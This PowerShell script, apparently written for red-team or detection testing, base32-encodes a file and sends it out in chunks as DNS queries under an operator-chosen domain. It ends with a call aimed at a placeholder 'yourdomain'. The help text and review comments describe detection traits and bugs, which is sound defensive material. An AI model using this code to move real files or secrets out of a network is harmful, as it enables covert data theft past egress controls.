TestDns-Exfiltration.ps1
# On your DNS server you may use tcpdump to get the results (tcpdump -n port 53)
function TestDns-Exfiltration {
<#
.SYNOPSIS
Generates DNS-exfiltration-shaped traffic from a file so DNS monitoring and egress controls can be exercised.

.DESCRIPTION
Reads the file at $filePath, re-encodes its bytes with the RFC 4648 base32 alphabet, and issues
one nslookup A-record query per chunk, with the chunk as the left-most label under $domain.
Per the comment above the function, the queries are meant to be observed on the DNS server
for $domain (for example with tcpdump on port 53).

Traits of the generated traffic that are visible in this code and useful when writing detections:
  - every query name is lower-cased and starts with one label of base32 characters;
  - queries are issued sequentially, one second apart;
  - each query is a separate invocation of the nslookup command.

.PARAMETER filePath
Path of the file to read. If Test-Path fails, "File not found!" is printed.

.PARAMETER domain
Parent domain appended to every chunk ("<chunk>.<domain>").

.PARAMETER dns
Declared with default "8.8.8.8" but never referenced in the body: nslookup is called without a
server argument, so the machine's configured resolver handles the queries.

.PARAMETER blocksize
Number of encoded characters per query label (default 32); see the chunking notes in the loop.
#>
param(
[string] $filePath,
[string] $domain,
[string] $dns = "8.8.8.8",
[int16] $blocksize = 32)
write-host "DNS File Exfiltration Test - @fgsec" -ForegroundColor "yellow"
$block_size = $blocksize
if(Test-Path($filePath)) {
# Whole file is loaded into memory at once.
[byte[]] $bytes = [IO.File]::ReadAllBytes($filePath)
# Each byte becomes an 8-character string of '0'/'1'; all of them are joined into one bit string.
$byteArrayAsBinaryString = -join $bytes.ForEach{[Convert]::ToString($_, 2).PadLeft(8, '0')}
# Every run of 5 bits is replaced by the matching base32 alphabet character.
# NOTE(review): when the bit count is not a multiple of 5, the last 1-4 bits do not match '.{5}'
# and stay in the string as literal '0'/'1' characters; no base32 padding is applied.
$Base32string = [regex]::Replace($byteArrayAsBinaryString, '.{5}', { param($Match) 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'[[Convert]::ToInt32($Match.Value, 2)] })
# Estimate only: the loop below can issue a different number of queries (see its notes).
$total_requests = [math]::truncate(($Base32string.length/$block_size))+1
# The value printed as "File length" is the length of the encoded string, not the file size in bytes.
write-host "[-] File length:" $Base32string.length
write-host "[-] Total requests to transfer this file:" $total_requests
# Blocks until the operator presses enter; nothing is sent before this point.
read-host "Press enter to start"
$key_start = 0
$key_end = $block_size
$p = 0
# NOTE(review): the loop ends as soon as $key_end passes the end of the string, so any characters
# after the last full chunk are never queried. The observed queries therefore do not carry the
# complete file; treat the run as a traffic generator rather than a faithful transfer.
while($key_end -le ($Base32string.length)) {
# The range operator is inclusive: the first chunk holds $block_size + 1 characters (0..$block_size),
# later chunks hold $block_size characters because $key_start is set to the previous $key_end + 1.
# NOTE(review): when $key_end equals the string length the range includes an index one past the
# end - confirm how that iteration behaves.
$payload = ($Base32string[$key_start..$key_end]) -join ""
$url = "$payload.$domain".ToLower();
write-host "[!] Request to: $url" -ForegroundColor gray
# A-record lookup through the default resolver; the answer is not inspected by this script.
nslookup -type=A $url
$key_start = $key_end+1
$key_end = $key_end + $block_size
# $p counts iterations but is never read afterwards.
$p++
# Fixed one-second pause between queries.
start-sleep -Seconds 1
}
} else {
write-host "File not found!" -ForegroundColor red
}
# Printed on both paths, i.e. also after "File not found!".
write-host "[#] Done" -ForegroundColor green
}
# Runs as soon as the script is executed or dot-sourced.
# "yourdomain" is a placeholder for the zone whose DNS server you are watching (see the
# tcpdump comment above the function); -filePath should point at a test file.
TestDns-Exfiltration -filePath "C:\users\public\testfile.docx" -domain "yourdomain"